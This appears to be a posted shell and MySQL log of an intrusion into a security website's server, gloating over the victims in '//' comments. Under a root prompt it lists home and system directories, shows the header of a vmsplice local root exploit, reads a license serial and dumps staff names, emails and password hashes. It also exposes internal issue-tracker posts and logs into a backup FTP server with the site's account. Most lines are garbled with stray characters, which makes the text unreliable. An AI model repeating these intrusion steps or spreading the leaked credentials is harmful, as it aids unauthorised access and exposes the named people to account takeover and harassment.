$ p6 V, n2 {* J% mtotal 141208
3 U& z2 F3 o& {" P* Ydrwx–x–x 10 com com 4096 Apr 28 12:40 ./ ?" r9 @" K3 y0 N
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. x5 ]+ y! T8 O: r
drwx—— 2 com com 4096 Jun 4 04:04 backups6 [8 q. E# g9 G6 p' Z6 ^
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql+ [2 ?* j* u/ ^. M t6 @, v' |
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system' f& B/ x: W5 x% Q- O
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
7 B* g6 q" O, U; H8 Q8 h; @-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
) R7 [# C( |: ^/ T% j-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
4 H+ g2 ~ L$ }4 B& b+ f# @-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc2 W+ `) Y; q& U8 p2 {5 V
drwx–x–x 3 com com 4096 Jan 29 2008 domains; H9 D) `( Q3 i. l0 o0 I3 x* I: n
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
% ^, ]7 g) }0 l/ K9 y& W7 K" hdrwxrwx— 3 com mail 4096 Jan 6 19:24 imap
, F i* l$ R( h9 f5 M-rw——- 1 com com 69 Nov 18 2008 .lesshst
7 T8 V0 N5 y5 D; s' J- S) ydrwx—— 2 com com 4096 Sep 24 2007 mail) v" S" \3 h, ?- x: G+ J+ F
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history. [4 p( y) G, @
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
0 u% X, V$ q0 W1 p. Glrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html2 E# u* T, g% w6 P3 _2 ~; T
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
* l- a7 h& l9 I6 {/ m/ E/ adrwx—— 2 com com 4096 Aug 26 2008 .ssh
- c* H- q8 k" A& `+ h-rwx—— 1 com com 8515 Feb 10 2008 t9 t; q1 l. t& e3 h3 h0 F8 S$ b4 T
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
$ g5 k4 t5 Z1 w! Z" y) |drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp' {8 I/ C, m0 R5 q4 {
-rw-rw-r– 1 com com 617 May 20 2008 .toprc# v0 M( I$ Z" V; m
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
+ f! h. w0 r! q0 D& ~-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
) H* t5 P( a+ @0 W: c! H1 u-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
' e( T% W: M3 z* E6 h ^5 z. E# B9 a" u! A9 a2 ?
sh-3.2# head t.c
+ z( f) A# a& Q$ [7 b! _+ D/*2 r$ `' l+ R- J
* jessica_biel_naked_in_my_bed.c
9 X( n; e' }7 U) E1 N9 v*9 Z) p& |$ o( y, E% z3 C8 Q
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.: P# F! r0 X' M
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
) C. k) n0 E( S# c! z! `* Stejnak je to stare jak cyp a aj jakesyk rozbite.- @/ I7 s% k: m& V
*
[$ W" ~' C, ^# b* Linux vmsplice Local Root Exploit
# T. H9 T v9 v8 \5 M5 T; I* By qaaz/ A$ @% G! n6 D7 g9 e
*
* J7 T( e4 B# I7 t! t/ {0 O3 J* C: G' V3 t8 W1 u
sh-3.2# cd /1 ~" t% c% [5 z1 G K
sh-3.2# ls -la0 {/ F% @3 A" p4 H" Y5 u
total 360
4 p5 s- x) y" p: Ddrwxr-xr-x 25 root root 4096 Jun 3 02:43 .7 [% d1 g* w. I# X2 G* F- O
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
1 K7 ]: v5 ?6 s5 ^/ M-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
1 f0 d' y7 ]3 D7 H# A# t; }-rw——- 1 root root 10240 Jun 3 02:39 aquota.user9 X$ c* s5 I0 d6 Z& n
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db0 u; A3 B; O, H# \8 }# D
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck% {) r* V8 g) D0 I/ _* ^
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
- ?0 Z4 a' e. L" t; d$ d* M& Wdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup0 U2 G* Q+ R4 [( U( K1 p
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
' i! r) X7 \2 N9 k- idrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot8 i4 J% s1 } w
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev( R6 s" ^3 d3 J( r v2 T
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc) j2 B/ v9 f/ c4 Z" t: x
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
0 i' d( z6 ~# M& T& j$ j1 p, Y-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf0 V2 i& u# i2 u
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib" w+ {, g3 v' ~/ Y( v9 T7 ]1 W% Z
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
' f5 [/ K. X& R0 D9 Z" ldrwx—— 2 root root 16384 Sep 11 2007 lost+found
* Y! U- T4 Z4 Q% U1 p( G) R, Y5 ldrwxr-xr-x 2 root root 4096 Mar 11 17:56 media
9 I7 Y2 a/ O# G, P$ Adrwxr-xr-x 2 root root 0 Jun 3 02:43 misc6 g! z9 n7 h* |& M% u4 E" \
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
! b3 S0 M$ h/ W6 \ G-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
0 T6 @" k' l. i* d5 Vdrwxr-xr-x 2 root root 0 Jun 3 02:43 net1 d# w u! Q6 \8 e* H1 K
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
J) t( w& W) i9 e! \. Idr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
8 k2 B& y$ J( I! b6 Tdrwxr-x— 15 root root 4096 Jun 4 08:40 root
( {8 B4 F. I1 B0 S# e2 C4 edrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin, L; y4 R1 b O
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
; w1 J6 G v& Vdrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv; M4 A, }! a* E9 _
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
) A9 C+ t! Q: Q$ Udrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
5 Y8 @- Q9 O) ]) R- j2 ]4 Mdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
8 k0 J% }2 z' V1 Tdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var% j+ Z. J$ s$ l* p, l
! n# K; c' g' q6 U9 Ssh-3.2# cd opt
" _' l3 O7 J6 x8 d3 c7 \sh-3.2# ls -la a% m8 l5 n. A: p$ O: P
total 20# g5 P) ^, _8 \0 g9 t4 [
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
* p! |4 ]! b- C- u1 ]+ vdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
7 O- x7 H1 a" n. y6 j% _6 bdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws4 D9 `6 o; C* a7 k, l8 f7 e0 ^
f) W# M0 O- r+ v4 @- M
sh-3.2# cd lsws// w4 b2 m; }6 U( ~# R; \/ O4 k+ q
sh-3.2# ls -la
2 N! }8 |8 Y& a3 vtotal 108
4 d5 c7 x9 v, d2 f) }drwxr-xr-x 15 root root 4096 Mar 20 2008 .5 y/ Y2 ?. _* K
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
$ b, \; l& m6 wdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
I7 E# N: N) K* rdrwxr-xr-x 13 root root 4096 May 29 15:10 admin, ?7 L- E3 G& ?5 ~' x4 y: G' r
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate3 O7 w% Z7 G+ d- o; B6 p' u
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
7 q0 Y! z) T4 Ldrwx—— 4 apache apache 4096 Jun 3 02:43 conf# p9 b4 h3 x0 ~9 g, Y& a, k4 N g
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
% f9 ]" C) }, qdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs
: |6 U/ D; W Y" ]* N. M G" Vdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin+ [4 W5 Q1 d4 U' x
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
2 ?2 s" B& k9 |& h# g2 v-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
1 U+ l# V' |- _- x( ^' z% c-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
/ r8 z/ g# t/ A: a1 `. z-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL- F2 p9 T" n. F/ L9 V) i
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
* k l) u% G# w- s) V1 bdrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
$ [, E6 c; l: b0 Jdrwxr-xr-x 2 root root 4096 Mar 20 2008 php [9 E) `9 w' A) S `0 C" n0 g
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild) `' f2 ~6 f& d6 Q/ o$ r
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
% h: m2 K: n/ i7 r/ d& M4 M-rw-r–r– 1 root root 6 May 29 15:10 VERSION
a: O0 f+ m$ Z5 e, v
u! q: M8 r7 U$ f; Esh-3.2# cd conf8 K8 ~( z) d7 @& p' f
sh-3.2# ls -la4 ~$ a0 G; T% B
total 48& \8 k+ K, c- Y8 L" ~7 r
drwx—— 4 apache apache 4096 Jun 3 02:43 .
0 L( Z* c2 d1 z5 |0 n' edrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
& u9 P, z8 ^ Wdrwx—— 2 apache apache 4096 Mar 20 2008 cert$ }" h2 X- i% I# e) s
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
s i& U$ X- `# L% v X/ Q1 F-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
5 S# `" Y" i2 X) k. R) w% l-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
- R( }/ |6 z, K. ]-rw——- 1 apache apache 256 May 29 15:10 license.key: ?. [& |0 d2 r2 d" U. C
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old+ ]5 o' g8 r- n J
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
/ a8 B$ _3 B$ S" I6 E u-rw——- 1 apache apache 20 May 29 15:10 serial.no
0 b2 J6 \0 k! m' Q: v2 Vdrwx—— 2 apache apache 4096 Mar 20 2008 templates
+ q8 Z, @+ t3 s5 f: q
9 V5 D) b; j) V ^sh-3.2# cat serial.no
7 _. o0 o8 D7 R& K/ X2 `1 u' OIbDl-oVsO-CKqL-wVRa
o6 t$ s3 c) S( K+ \# J/ n- e& X4 S3 f7 ~& W1 u# h
sh-3.2# mysql
" j; |* D' h3 a2 S: VWelcome to the MySQL monitor. Commands end with ; or \g.
# ]: D) t3 ]* o" F2 O: XYour MySQL connection id is 286844" H7 q0 R" ~5 I, o4 P+ O
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
6 u3 l, d3 ]0 J* {7 I- a0 {: D# d- h/ R5 T9 P
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
$ ]: `* G$ j# |& K2 D. C8 ^7 D# G7 `$ s3 }) Z
mysql> show databases;; |. M& ^% ]( Y f3 Z$ F
+———————–+
5 F9 _, L( }$ F6 ]. |8 W| Database |
1 k6 u) _1 t9 D( ]+———————–+
6 B; l4 }+ t/ i3 ~0 F7 d| information_schema |% V* s" L5 l- j. T9 n9 [
| astanet_ads |9 e" S( E0 @# X5 {. a V" g+ F
| astanet_mailing_lists |
& Q5 J- k5 s( ]: J5 |: _& R0 o| astanet_mediawiki |5 j$ T5 D/ c! k4 @; i7 `$ G5 }: @: \
| astanet_membersystem |
7 N; D) `/ n0 B0 W% c1 K| com_contrexx |' Z8 k: x5 q% C0 d* b
| com_contrexx2 |; ]+ V; k4 S! h! B$ B$ r$ X1 p
| com_contrexx2_live |) @3 [' z, C- F2 \
| da_roundcube |8 ~5 x) ~* ^7 k5 n
| dolphin |
0 T7 {% c8 m x| ideapool |/ q* U# Z& X1 p l: X: L
| mysql |
% g' L! J( B5 V/ W' R. h| test |: r g# P6 c6 W1 G& R0 U
| yourmaster |
1 d! g- P; o Z: f3 O9 @7 D% C+———————–+
: p4 S1 X7 R+ D- N( |* V14 rows in set (0.00 sec)7 _: Q0 l L( i Z1 g0 x
* P1 P. c; l6 o4 l) f6 ~
mysql> use ideapool
/ ]5 j4 ] ~5 d2 D! _& {Database changed; a4 b$ L( d( J' r7 @
mysql> show tables;# b2 I$ O8 P( m5 c* b
+———————————–++ F0 ~6 w, Z; n" w$ W2 S7 R3 |$ S
| Tables_in_ideapool |) e; o; ` O6 A3 Z% w: k8 J
+———————————–+
& W$ L6 s9 n+ q0 _+ d% {6 L| eventum_columns_to_display |+ V/ R! B0 s! R& {! f3 P f: K4 }* s# I2 d
| eventum_custom_field |
; [. a) Q! j, B1 Q' j| eventum_custom_field_option |7 Y: Q* X/ k/ X& D' h$ X; m6 \
| eventum_custom_filter |( T' l* G- H, s' }: Y7 k) _
| eventum_customer_account_manager |2 ?/ P9 m4 J( r+ H8 g" c( p/ h; r
| eventum_customer_note |9 x; J" z$ v0 r- ^
| eventum_email_account |+ |7 ~: j5 @1 C
| eventum_email_draft |" u) R( R2 c7 ~' V4 P. _
| eventum_email_draft_recipient |7 O6 N2 e. H0 s, _2 H
| eventum_email_response |
! W. D. Z% R2 d& ?( b4 o| eventum_faq |
; t# `2 a$ E/ K, O* t. d: Z3 y| eventum_faq_support_level |- D! K$ H+ J8 r' p! D) m
| eventum_group |
) F) Q5 O# X3 @| eventum_history_type |, I9 x+ t) ^6 S+ Z! e0 t
| eventum_irc_notice |, n9 ]& y8 d; C$ y+ f }
| eventum_issue |; c$ x: D3 [8 W0 B$ N' ^
| eventum_issue_association |+ Q$ c+ K% y6 J7 s9 m1 ~
| eventum_issue_attachment |! C1 f1 K/ A1 Q( F
| eventum_issue_attachment_file |
) V6 W5 f6 Z1 K7 x| eventum_issue_checkin |
- [4 H; ~# ?# C e0 a% j- C* w| eventum_issue_custom_field |
# Z' d5 `) e" y, C| eventum_issue_history |
. W. @- K' W" X6 s% O| eventum_issue_quarantine |* B& }2 @# V G
| eventum_issue_requirement |5 q+ F, Z- O1 E
| eventum_issue_user |2 K1 E7 l4 A$ L- D2 b
| eventum_issue_user_replier |; v2 i1 u p7 a" V' I1 {0 q
| eventum_link_filter |9 t+ t7 H" Q# ?! |- e. q$ P
| eventum_mail_queue |! x! v/ ~. g1 M$ N9 G! c: t: d$ n
| eventum_mail_queue_log |
6 p& v1 d: p& l" s! i9 g) c| eventum_news |9 L4 a) G3 k) [" r# Y
| eventum_note |
; @9 r3 G/ W+ r R+ k, @% D| eventum_phone_support |* q- z! `2 n5 u1 g0 q
| eventum_project |
$ W5 c' ]& }* z5 I, u& R6 H| eventum_project_category |
, Y8 q* ]: U: t2 U+ ]2 \+ j| eventum_project_custom_field |. k1 \+ `& J" I( ? q6 H) h% w- @ N- P
| eventum_project_email_response |$ e! k+ j) Y. @1 l
| eventum_project_field_display |
% ~+ j4 x* z- `9 }& L) j0 }& R! N| eventum_project_group |
_4 e' \3 v! u# G P6 [: |& I| eventum_project_link_filter |
+ d- I" e E- c5 F0 T. N2 K| eventum_project_news |4 I1 m- B$ U) C7 j+ K1 y
| eventum_project_phone_category |
% u9 T5 B! d# I# `9 k3 I| eventum_project_priority |
5 q- b6 g4 t/ B' Q, r| eventum_project_release |; v% f0 P2 P" O3 {! I2 I
| eventum_project_round_robin |
, Q" i4 Q: G2 O& \+ `* ]8 E+ K| eventum_project_status |
$ m0 g ?4 G0 V! G) B+ |' i| eventum_project_status_date |, `& z; i! ?. k
| eventum_project_user |
/ M0 u- ]6 P6 |, @" a/ b| eventum_reminder_action |
4 d2 [& p* J6 s: ~, w| eventum_reminder_action_list |
7 y( z2 p, y/ j. e| eventum_reminder_action_type |
* F% X' B# b' m& W n0 p2 Z/ d| eventum_reminder_field |5 F6 w9 U; n' f4 W" Q/ M' G) \
| eventum_reminder_history |
# a7 j6 n8 D4 U' M9 z| eventum_reminder_level |) W+ |- u8 W7 k: D/ l5 I: O; B7 U
| eventum_reminder_level_condition |' F$ \& [ |; ~3 T6 Z8 D
| eventum_reminder_operator |
/ ?4 ?3 R% D( b6 S5 H/ S! U6 o| eventum_reminder_priority |
& G" \4 A- F3 {| eventum_reminder_requirement |
# `, G8 K9 e8 O* _| eventum_reminder_triggered_action |
m" t2 g. O- p/ S6 e| eventum_resolution |, R3 |6 V& C* }) u! o/ b9 z
| eventum_round_robin_user |
( b, e: |) I# Y/ V. O| eventum_search_profile |4 a' x$ M% f; B3 }6 q4 e. B, ~& _
| eventum_status |
3 h8 E8 V* C& p6 W, D$ u2 ]| eventum_subscription |
9 X7 ]/ j. u. ?, }' f+ S2 f5 r| eventum_subscription_type |1 N9 ]' H7 @$ w; q3 {
| eventum_support_email |5 q+ l$ C1 O, i: g" Z9 W" O
| eventum_support_email_body |! |1 U M7 ]* d J8 L- n
| eventum_time_tracking |/ f5 x: T/ G6 R2 ^6 z' b$ K$ y9 m
| eventum_time_tracking_category |7 H$ L; ?7 n! i2 ~ z
| eventum_user |& K1 v4 P% J. a+ p+ a2 L! i
+———————————–++ d$ M2 k1 a, D6 v8 b6 n
69 rows in set (0.00 sec)
) s, r4 e& |" h0 Z& v1 T) @" a2 Y2 d+ G3 n
mysql> describe eventum_user;
% g2 k. q) Z) A: n7 D# \& ]: v+————————-+——————+——+—–+———————+—————-+
* y$ {( _, n" U5 p! L( R4 a$ `' r| Field | Type | Null | Key | Default | Extra |
( C& W f$ d/ W3 Y; N6 {+————————-+——————+——+—–+———————+—————-+
7 w) w9 R4 N: T" R( L| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |0 C+ p. Z; I! V) K
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |, W% G% d& t3 T4 [; m3 h" x" p
| usr_customer_id | int(11) unsigned | YES | | NULL | |
0 A& e' }5 w% O1 _* r6 w9 L/ T: }| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |# X' c8 ~; _9 s" \& x, z
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |0 h L, b! R d. d* s: o
| usr_status | varchar(8) | NO | | active | |
; ^9 C3 x( f: G! u| usr_password | varchar(32) | NO | | | |/ H% s0 \, Q# t; u. o, k
| usr_full_name | varchar(255) | NO | | | |# h: n+ w) t( G! {5 n9 Q
| usr_email | varchar(255) | NO | UNI | | |
2 Z1 W6 h" T( g2 v: ^0 F1 R! O| usr_preferences | longtext | YES | | NULL | |9 f- ?$ ]" [* \: P f
| usr_sms_email | varchar(255) | YES | | NULL | |
+ z: t) A% s) T# b, x| usr_clocked_in | tinyint(1) | YES | | 0 | |' ?# C) N+ l" f B3 @1 v7 G, m
| usr_lang | varchar(5) | YES | | NULL | |
) o* f, ~6 v* |+————————-+——————+——+—–+———————+—————-+3 ^! c# Q% x( h" B" b4 U
13 rows in set (0.00 sec)9 ?( U* S4 t2 N7 [
q- `% P$ q+ z7 m* xmysql> select usr_full_name,usr_email,usr_password from eventum_user;1 q1 c- E* ]5 f
+———————-+——————————-+———————————-+
6 M) {! I, K) R# }1 c3 S| usr_full_name | usr_email | usr_password |
3 t! F0 z+ {& R4 L0 t+———————-+——————————-+———————————-+5 D7 }, e( M5 O* |
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |7 O s* x9 X4 R1 Q5 H* K
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |! q/ y( ^/ U4 L' Q* z# o
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
) S: z1 I1 h* P; ~# [| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
$ p. m% A7 f9 W8 S| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
+ h( d8 ?$ x0 q. w' b5 I3 E/ C( w# F| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |, I' f8 h# K; A3 g- |! F
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
* J0 l/ n$ s' c3 t& J# w1 \| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
W# G1 Y5 Z* f; I1 U% J G| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |+ _- H/ D" @. w% d
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
; M) |* n/ |' p' a* @: A4 i/ d6 s) D3 P| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
1 U5 r5 m% }7 P; a- @+ o| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
; E8 _, V$ ^+ e* i$ Z| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
4 A _% F+ ~3 C& r# J; H* @| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
& i$ c' y2 v3 u8 o2 || cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |) J! S; m# B* Q, Q# H2 P
+———————-+——————————-+———————————-+5 @3 y4 k+ u9 ?# `1 f, F
15 rows in set (0.00 sec)
* Q* {; m4 H# E7 i0 K5 A+ L$ v# d/ o$ z9 F
mysql> select iss_description from eventum_issue where iss_id = 43;
, _( t9 X3 [1 W. f, l1 U+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+( ~* {7 a, A* @" i
| iss_description
5 `8 y$ x7 L! w, E9 n8 Z|
5 M" F; X8 L$ h# S4 Q8 C( c+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+, U7 i# N Q8 |
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
5 r0 O/ ^3 `2 G9 t5 E9 o! _4 Nconnected for 90 mins… 120mins… so what i propose is something like:% ?, j' T, q1 `5 B1 e
链接标记[url]http://www.surfthechannel.com/[/url]
4 J# ~9 j4 z' ~( b! `6 csince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
% L6 \3 W5 d1 Q' S/ olike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
4 M1 u8 I+ `2 @0 \' nbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
: R |' V: _# Aif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
9 c' H6 T3 n0 a: ^8 M. P+ f
/ U7 d% m& {" k8 W+ aWe could also put advertisement during play on the flash video player itself… extra $$…& P( O# U: @ x3 Z: {2 v7 X
$ p1 m" V- F7 Z) `' D3 D- T* CBy sykadul |
9 I' n( g/ r8 e2 D. D+ a+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
- l5 g3 b- \( w1 row in set (0.00 sec)1 h9 a4 ~' F g* R0 H( G* V& j+ @
/ b& {2 [, G- g* N// Money and extra $$ is all they care about. remember that.# G5 t# y* {; X/ P' [ N* s8 Y
$ r: z( \# ^+ q
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
/ |/ i1 }; ~9 r9 I5 w+————————+——————————————————————————————————————————————————————————————————————————————-+, c; q6 J- T9 t' b! A6 Y9 P
| iss_summary | iss_description 0 r6 s6 c- P8 d$ ~4 i' ~1 \! o
|/ Q" Q( C# b: T4 o9 |! q
+————————+——————————————————————————————————————————————————————————————————————————————-+
& X n; f4 j: M! D, c; J% @| Forum for REAL EXPERTS | Hello,
8 k! W' Z' O" `+ b
' J8 j+ Q5 K; n; NIshtus and I,
& ^2 J/ d( Y5 H* D3 v* O/ x8 g" _. q) \5 d1 U
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide# B5 y* [; p! N# H+ y4 y+ s8 ?
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
& V# r: C2 @0 {5 D
+ C" l& Y) S' _1 k1 N4 n$ ROne example a friend of mine from coresecurity.com!& o& ?' K# |5 j( D
( M5 j7 \( j- C! p
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..9 W6 n- m" r% H& v M9 A5 R6 Z
# h' j. Z5 Y5 `. v8 ^% l|
, r+ M B1 l0 o9 ]8 m3 _$ r+————————+——————————————————————————————————————————————————————————————————————————————+8 L, [3 k! W6 g: i
1 row in set (0.00 sec)
9 @% c0 y3 i" E3 @6 l$ I& M* _6 a/ Z* G0 Y+ m: _5 {- t
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
+ X( K) A% b. n% W& w
9 B) X4 f; s; @! g8 Xmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
. Z4 J5 f" }- T, y$ j0 t! R+——————+———————————————————————————————+6 U1 ~1 Z$ V. D$ `- W7 D( m
| iss_summary | iss_description |) C$ d( D- J+ i$ D
+——————+———————————————————————————————+8 U- z* \# l- t0 }7 V# y
| Website guidance | Virtual Girl which guides you trought the website.! A. q+ Y4 V5 M- I
# P' p4 R) \. ~( C6 _* L
We need a girl with who you can ( talk )!!!
: G9 t+ }' I# N% |8 w WAlso for the News!" m7 b8 J! |6 C* _! f* U& X. e1 E. I
So my suggestion is a girl who read you the news loud if you like!1 P, k d+ \2 m' v" b T
you can choose between read yourselfe or she read it for you or both!
+ D6 |, Z: G+ S, N8 [* Y% R" m5 y* f% V9 A8 G3 Y. H' K9 D! l8 [
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!! n# s$ Q0 v4 i) Y
9 D: k) Y, z7 G# u2 `' p% g5 n* i7 J* MHave a look on the example girls!! G6 K9 y a- I
' B! R4 n9 a$ Z3 n3 O" N1 `0 g- S
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
' ~% A4 X. |. b1 R" K0 t. k* {4 |/ L& R& q$ U4 F3 y/ Z* [* A5 X$ y
or that" S9 G W4 Y; Y1 K+ J2 R/ S$ ~5 D
! j5 ^ J1 @, A+ G. o5 J5 w
链接标记[url]http://www.yellostrom.de/[/url]" M3 q3 Z/ a' ^
, r, J5 }0 n9 a7 g
|. o9 b& l! ]$ J4 Z9 `% K
+——————+———————————————————————————————+" k0 {6 ]1 ?' h. Q* P& G, |+ h
1 row in set (0.00 sec)) H+ J# O k) P5 o' p
/ G) }( o/ J; h% q' u
// ha ha.
& k4 g, A2 n4 p% A- x" S9 N
N! q+ I; J6 Bmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;$ D5 Z9 ?+ G3 b N' N
+————————–+———————————————————————————————————–+
, M* ^, g6 N) w4 s& n" d# O| iss_summary | iss_description |
0 r! a- I: s L+————————–+———————————————————————————————————–+
& Q4 B( C% x [| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
9 A- k1 w8 W. k' c& V6 U6 l2 J" Y8 y+————————–+———————————————————————————————————–+
2 W$ h$ i2 G( ]5 [7 y% |; f# v1 row in set (0.00 sec)- ^+ h/ E& F0 r$ }9 v
/ k. _% e1 S6 |& {2 v# e
// LOL.
/ a2 n+ {& N; i: y( u" O) `# J1 S7 T! ^8 x' @) y& f
mysql> exit; n S6 X( z$ g
Bye
: J( t8 x D3 P4 c0 D- S7 w6 b' o" h0 |; X
sh-3.2# ftp 212.254.194.1638 }. q' u2 B; y9 j7 N6 \
Connected to 212.254.194.163.0 q& O! y; E$ L- ^5 y1 ^' m% t
220 BackupCOM_VW FTP server ready.
4 `( m0 w3 {* P, O: o- y504 AUTH: security mechanism ‘GSSAPI’ not supported.
4 s- @! R% m5 O9 i504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
; U4 v. p) z7 ?5 `2 m6 l# XKERBEROS_V4 rejected as an authentication type
; o( @* c# w* Y. h$ H fName (212.254.194.163:root): astalavista.com0 E8 }/ a: ^3 Q" d2 e: o1 M
331 Password required for astalavista.com.
% a1 U' i& q+ d e q9 UPassword:: W" M& }& P, z+ \: C; @. _
230 User astalavista.com logged in.
- `* g6 E6 T4 p8 N( W6 c, iRemote system type is UNIX.: C1 B# @! ]+ ~5 F; A6 I; v6 k) J
Using binary mode to transfer files.
1 u+ s8 x- H. ]6 W' k# yftp> ls -la$ c% S8 @9 B7 e' [
227 Entering Passive Mode (212,254,194,163,2,188)
4 z" @2 w T3 v8 R150 Opening BINARY mode data connection for ‘file list’.
4 y# b# j7 u; H& t% |# g3 Udr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com2 F6 b/ S* x4 I+ C3 ~. C+ K
226 Transfer complete.
